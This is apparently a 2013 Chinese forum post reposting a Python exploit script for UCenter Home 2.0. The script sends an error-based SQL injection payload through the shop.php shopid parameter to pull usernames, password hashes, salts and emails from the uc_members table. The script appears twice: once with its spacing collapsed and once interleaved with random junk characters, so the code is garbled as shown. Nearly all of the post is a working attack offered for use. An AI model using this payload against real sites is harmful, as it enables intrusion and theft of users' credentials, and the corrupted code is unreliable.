#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl+ R- A X" g C: O) R3 w
( F$ e6 G' L' w' w3 O6 P' u2 j- }% z# O, r0 M& A0 M5 k" [
#!/usr/bin/env python 0 o1 J' {1 x2 v' B5 \: u
, w- Y% D: S* p/ d. r. _0 ~$ c) A r1 r
import sys , S! t5 i! F: W3 v' q
import urllib2
5 `+ X3 }" I' `( z. }- ]" iimport re 9 w" v0 b, R6 z' n- P+ |% U2 s
& k5 J/ t# m* W# C7 E K
def info(): 5 y. J* L4 I; s7 j
print 'From:http://www.exploit-db.com/exploits/14997/'
# Y8 \: Z' P2 y$ {* C print 'http://www.hake.cc/Web_loudong/'
h7 H; D% i+ R0 y# x print 'changed:qiaoy'
3 [1 F" `3 v5 [" o* Z/ U0 ?! g+ Z print 'exp:'
, ]& ~7 E* Z1 f, f h( s2 E print ' ./UCenter_Home_2.0.py site'
" l7 T; t; M, X) Y, p. N
8 Z$ X' i' k. ldef main():
6 S8 S" P* C2 [5 W- U if len(sys.argv) != 2:
* l6 r4 l& |% Y info() 4 k2 v3 |) @ m6 j
else: 7 A! L2 ]1 m8 T) A" q% A
site = sys.argv[1] - ^* s: y$ W" X3 t' Q& R
if site[0:7] == 'http://':
. L* B( z2 R& g. a Z* E) @ sitesite =site 3 p \% m2 p. [
elif site[0:8] == 'https://': ; D) C" }0 _6 B
sitesite = site 8 o* L) D# Z' v Q$ L8 I' a
else:
: ~) `& X- U# p. k site = 'http://'+site
* O& L9 D) k% }* F) M try: 8 r0 d2 P% q1 k4 h
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' + i r% v" ~& O- v, a+ J
Value = urllib2.urlopen(url).read() 3 P- c2 C" L. g$ _- q
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
) E0 C2 j" P3 T3 G3 m2 T hacked = Msg.split(':') + R3 U8 E8 b6 t1 g
print 'Name: '+hacked[1] 7 n/ {3 G k/ Z; Y! S6 M! P! F
print 'Passwd: '+hacked[2] 7 `! r4 T6 }% O
print 'salt: '+hacked[3] + u5 C$ ?6 m1 i# O: l6 I; T5 K1 c; D
print 'email: '+hacked[4]
6 D/ V2 k, i& n9 ^, T9 J except:
3 z @: A% _1 p- c0 {- q& ? print 'Sorry,I can\'t work............' " a& m4 y% f% X2 j& }8 p
! J6 I. o# j! l; C
if __name__ == '__main__':
) X" a3 B0 Y# E9 J' J main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对